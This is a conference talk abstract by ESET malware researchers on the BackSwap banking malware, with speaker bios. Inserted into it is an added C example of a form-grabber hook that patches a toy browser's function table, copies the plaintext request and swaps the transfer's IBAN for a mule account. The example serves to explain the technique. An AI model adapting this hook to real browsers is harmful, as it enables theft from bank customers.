BackSwap – The future of banking malware?
Michal Poslusny & Peter Kalnai, ESET
When we discovered a new banking malware family back in April 2018, which we later named BackSwap, we were shocked by its completely new approach to banking fraud, which is very different from the techniques used by conventional banking malware, techniques that have been evolving for over a decade. The conventional method usually consists of injecting a malicious module into the browser and then hooking specific browser functions in order to read and alter the browsing data. While code injection is still somewhat effective, it has many drawbacks. Most importantly, the injected payload needs to match the characteristics of the specific targeted browser, which forces the malware authors to build multiple versions of such a module: to install its hooks successfully, the banking module needs a dedicated branch of code for each browser it wants to attack. This means a lot of work for the malware authors and frequent maintenance of the banking module, especially when targeting the prevalent Google Chrome browser, whose internals are very specific, so that the malware authors tend to lose support every time it receives an update.
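As an added illustration of the conventional approach described above (this is example code written for this page, not code from the talk, from BackSwap or from any real browser): a toy form-grabber hook in C. The fake browser reaches its network layer through a table of function pointers, standing in for the import table or vtable that a real injected module would patch; the hook copies the plaintext request ("read") and rewrites the beneficiary account ("alter") before handing off to the original function. The browser, the table layout, the request format and the mule account are all constructed for the example. Note that the hook only works because it matches this particular table layout and function signature; a browser with a different layout needs a different hook, which is the per-browser coupling the abstract describes.

```c
/*
 * Added example, not the authors' or BackSwap's code: a toy form-grabber hook
 * in the style of the injected-module-plus-hook approach used by conventional
 * banking malware. The "browser", its function table, the request format and
 * the mule account are all constructed for illustration.
 */
#include <stddef.h>
#include <string.h>

#define BUF_MAX 512

/* The fake browser calls its network layer through a table of function
 * pointers. A real injected module would patch an import table or vtable;
 * either way the hook is bound to this exact layout and signature. */
typedef size_t (*send_fn)(const char *buf, size_t len);
struct browser_net {
    send_fn send_request;
};

/* What actually "left the browser". */
static char   g_wire[BUF_MAX];
static size_t g_wire_len;

static size_t real_send_request(const char *buf, size_t len)
{
    if (len >= BUF_MAX) len = BUF_MAX - 1;
    memcpy(g_wire, buf, len);
    g_wire[len] = '\0';
    g_wire_len = len;
    return len;
}

static struct browser_net g_browser = { real_send_request };

/* ---- the "injected module" ---- */
static send_fn g_orig_send;          /* saved pointer to the real function */
static char    g_grabbed[BUF_MAX];   /* plaintext copied before sending    */

/* Replace the value of the "iban=" form field with the mule account.
 * Returns the new length; copies the request unchanged (truncated to cap)
 * if the field is absent or the rewritten request would not fit. */
static size_t swap_iban(const char *in, size_t len, char *out, size_t cap,
                        const char *mule)
{
    const char *field = "iban=";
    size_t flen = strlen(field), mule_len = strlen(mule);
    const char *p = NULL;
    size_t i, prefix, j, suffix;

    for (i = 0; i + flen <= len; i++)
        if (memcmp(in + i, field, flen) == 0) { p = in + i; break; }

    if (p == NULL) {
        if (len > cap) len = cap;
        memcpy(out, in, len);
        return len;
    }
    prefix = (size_t)(p - in) + flen;          /* up to and including "iban=" */
    j = prefix;
    while (j < len && in[j] != '&') j++;       /* end of the field value      */
    suffix = len - j;                          /* "&..." that follows         */

    if (prefix + mule_len + suffix > cap) {
        if (len > cap) len = cap;
        memcpy(out, in, len);
        return len;
    }
    memcpy(out, in, prefix);
    memcpy(out + prefix, mule, mule_len);
    memcpy(out + prefix + mule_len, in + j, suffix);
    return prefix + mule_len + suffix;
}

static size_t hooked_send_request(const char *buf, size_t len)
{
    char patched[BUF_MAX];
    size_t n = len < BUF_MAX - 1 ? len : BUF_MAX - 1;

    /* read: grab the plaintext before the browser sends it */
    memcpy(g_grabbed, buf, n);
    g_grabbed[n] = '\0';

    /* alter: redirect the transfer, then hand off to the real function
     * (constructed mule account; not a real IBAN) */
    n = swap_iban(buf, len, patched, sizeof patched, "DE00MULE0000000000");
    return g_orig_send(patched, n);
}

/* Patch the browser's table in place; returns 1 if a hook was installed,
 * 0 if it was already hooked. */
int install_hook(struct browser_net *net)
{
    if (net->send_request == hooked_send_request) return 0;
    g_orig_send = net->send_request;
    net->send_request = hooked_send_request;
    return 1;
}

/* The fake page submits a transfer form through the (possibly hooked)
 * table; returns what actually went over the wire. */
const char *submit_transfer(const char *form)
{
    g_browser.send_request(form, strlen(form));
    return g_wire;
}

const char *grabbed_plaintext(void) { return g_grabbed; }
```

Calling `install_hook(&g_browser)` and then `submit_transfer("amount=250&iban=DE89370400440532013000&ref=rent")` sends a request whose beneficiary has been swapped for the mule account while the original plaintext is retained in `grabbed_plaintext()`. The sample IBAN is a constructed test value.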
In our talk we will not only provide a detailed analysis of the malware itself, its evolution, its innovative techniques and the whole distribution chain, but, thanks to our active involvement in the investigation, we are also able to share interesting details from behind the scenes of the operation, for example how the attackers recruit unwitting people and use them as straw men (money mules) to cash out the stolen funds. Additionally, we will present our ideas for potential mitigation of such techniques, as we expect that more and more cybercriminals will eventually shift their attention to methods similar to the ones used by BackSwap.
Michal Poslušný is a malware researcher at ESET, where he is mainly responsible for reverse engineering complex malware threats. He also develops various internal projects and tools and has actively participated in research presented at the AVAR and Virus Bulletin conferences. In his free time he likes to play online games, develop fun projects and spend time with his family.
Peter Kálnai is a malware researcher at ESET. As a speaker, he has represented ESET at various international conferences including Virus Bulletin, AVAR and cyberCentral. The malware he dislikes most is crypto-ransomware, because it shows hardly any inventiveness and has a very destructive impact on the victim. His golden rule for cyberspace is to always prioritise security measures over user comfort. In his free time he enjoys table football and travelling.